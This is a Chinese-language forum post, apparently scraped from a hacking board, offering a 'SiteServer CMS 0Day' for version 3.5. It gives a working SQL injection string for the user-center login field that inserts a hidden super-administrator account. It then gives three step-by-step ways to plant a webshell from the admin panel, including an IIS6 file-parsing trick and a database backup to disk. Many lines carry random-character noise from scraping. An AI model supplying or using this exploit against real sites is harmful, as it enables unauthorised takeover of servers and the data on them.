SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

" Z1 L/ G7 g& B9 j- g* B6 g; Gstieserver官网:www.siteserver.cn

0 ~- S9 ^3 t% n7 h
# w1 L& I/ B# c
4 n2 ~/ {" s) H# }% _EXP:
: k% @) P. U2 ~0 `" Y/ ]; C
3 A4 Y4 M2 o6 s直接访问UserCenter/login.aspx

% R& J$ @8 j* {$ s$ f7 o$ @

9 D, W, q0 e, G4 }. }3 E用户名处输入：
* t6 ~3 U  R* K: Y. J4 H" V+ D
& a: i5 g. }4 Y) W7 x' y/ P123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
2 E) [  r9 k$ S( Z# D5 w
2 [* f5 s1 }( j; F& q0 ]3 l/ l! ~  B

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。


" \, A1 ^9 P+ a9 F- c. z# ^3 \
, A5 Y% n/ U! k, s6 B+ _5 n之后再访问后台SiteServer/login.aspx用插入的用户登陆
: u2 o! ^5 O# h+ l, i2 O7 f
" X! R# Q9 R& q1 ^0 q+ L1 K) M

0 V7 |+ D! h+ p& E1 W  P9 l后台拿webshell的三种方法：

. U  P0 w! \/ N; |一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
: U: f3 Q3 d, ^( [7 f. H3 `
二、
$ ^8 ?8 F1 u% c
成员权限-》添加用户-》用户名为：1.asp
2 b$ H3 I( h) k% W
, p1 P; X; L+ g, Ohttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

, d: W1 h6 }  f. d（ps：后台添加用户时不会验证是否含有非法字符）

- T: X4 g8 V, U6 `4 y- m三、

8 Y1 ~/ Z( ]$ b! A4 j系统工具-》实用工具-》机器参数查看
1 F8 H: W: ^0 r可以看到数据库类型、名称，WEB路径
* a& ^/ a4 Y2 O( x
系统工具-》数据库工具-》SQL语句查询
  P1 B. K! T7 l9 ?+ H5 K这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。